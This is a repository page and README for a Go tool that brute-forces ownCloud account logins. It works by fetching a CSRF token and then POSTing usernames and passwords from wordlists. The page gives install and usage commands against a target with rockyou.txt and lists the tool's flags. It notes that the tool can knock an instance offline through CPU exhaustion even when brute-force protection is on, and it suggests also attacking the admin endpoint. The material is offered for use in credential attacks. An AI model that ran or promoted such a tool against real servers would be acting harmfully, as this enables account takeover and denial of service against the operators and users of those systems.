Simple tool to bruteforce owncloud instance
Go to file
2024-04-13 15:11:34 +00:00
go.mod v1 2024-04-10 04:28:08 +03:00
go.sum v1 2024-04-10 04:28:08 +03:00
LICENSE license 2024-04-10 04:45:38 +03:00
main.go readme updatet 2024-04-13 18:09:16 +03:00
options.go options sanity check update 2024-04-12 07:33:54 +03:00
README.md Update README.md 2024-04-13 15:11:34 +00:00

owncloud_bruteforcer

Simple tool to bruteforce owncloud instance accounts

A word of caution - tool by default can DOS owncloud instance.

Description

Tool:

  • make GET request to acquire CSRF token + cookies
  • make POST request using given username and password wordlist.

Installation

go install git.sual.in/casual/owncloud_bruteforcer@latest

Example

owncloud_bruteforce -u "https://target.com/login" -P ./rockyou.txt

Help

Owncloud_bruteforcer - tool to bruteforce user

Usage:
  owncloud_bruteforcer [flags]

Flags:
INPUT:
   -url, -u string                target's url to login page. Example "https://example.com/index.php/login, http://example.com/login "
   -login, -l string              username to bruteforce (default "admin")
   -login-wordlist, -L string     username wordlist
   -password-wordlist, -P string  password wordlist
   -proxy, -x string              HTTP proxy for packet inspection (Burp/Caidu/ZAP) (for example http://127.0.0.1:8080). But be aware, if you enable inspection then attack will fail because of delays
   -threads, -t int               threads to bruteforce (default 10)

Notes (TODO)

  • Expect to DOS service (100% CPU) (even if it have bruteforce protection enabled) if you prefer not to, set -t 5 or less (but it will slowdown attack)
  • Successful login detected by redirect location after POST request. If user have 2FA, then app will not show found login:password. (Detects by redirect location)
  • Bruteforce protection isn't detected (after hitting limit, response to POST - 403 instead 303)
  • If there is internet connection problem or WAF/rate-limit/etc blocked you, you may recieve can't create (POST) request: Post "https://target.com/login": context deadline exceeded (Client.Timeout exceeded while awaiting headers) and attack will stop without a way to continue
  • There is way to bruteforce administrator account which use different endpoint, possibly can allow to bruteforce admin account in same time without slowing down current version of tool

License

This project is licensed under the MIT License - see the LICENSE file for details. I am not responsible for any actions or damage.